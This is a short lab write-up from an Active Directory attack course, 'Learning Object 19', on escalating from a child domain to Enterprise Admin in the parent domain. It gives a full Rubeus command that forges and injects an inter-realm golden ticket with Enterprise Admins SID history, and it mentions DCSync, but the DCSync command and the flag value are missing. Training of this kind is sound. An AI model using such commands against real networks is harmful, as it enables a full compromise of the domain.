19 - LO1️9️
Learning Object 19
Tasks
1 - Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local using dollarcorp's krbtgt hash
Flag 30 [mcorp-dc] - NTLM hash of krbtgt of moneycorp.local 🚩
Solutions
1 - Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local using dollarcorp's krbtgt hash
We already have the krbtgt hash from dcorp-dc. Let's create the inter-realm TGT and inject. Run the below command:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-golden /user:Administrator /id:500 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /netbios:dcorp /ptt
We can now access mcorp-dc!

We can also execute the DCSync attacks against moneycorp. Use the following command in the above prompt where we injected the ticket:
Flag 30 [mcorp-dc] - NTLM hash of krbtgt of moneycorp.local 🚩
krbtgt NTLM has is:
Last updated